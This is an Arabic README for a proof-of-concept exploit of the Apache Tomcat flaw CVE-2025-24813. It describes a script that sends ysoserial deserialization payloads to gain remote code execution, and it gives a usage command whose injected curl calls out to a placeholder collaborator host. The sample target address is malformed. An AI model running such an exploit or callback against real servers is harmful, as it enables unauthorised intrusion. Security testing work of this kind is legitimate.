
إثبات مفهوم لـ CVE-2025-24813
تؤثر CVE-2025-24813 على Apache Tomcat - إذا كان الإصدار هشًا وتم ضبط إعداداته بشكل سيئ للغاية، يمكن للمهاجم الحصول على RCE من خلال طلب GET واحد وطلب POST واحد.
مزيد من المعلومات هنا
هذا هو سكربت Yiheng An وJun Li وQiang Liu وHaozhe Zhang وQi Deng من الكتابة الفنية الأخيرة، وقد تم تعديله لقبول أمر، وتوليد جميع حمولات ysoserial gadget، وإرسالها إلى هدفك.
تمت المشاركة في سبيل الاختبار الأمني الأخلاقي.
مثال الاستخدام:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
يُظهر poc.mp4 السكربت أثناء العمل، حيث يولّد الحمولات ويرسلها إلى الهدف، وفي اللوحة اليمنى نرى مستمع interact يتم استدعاؤه.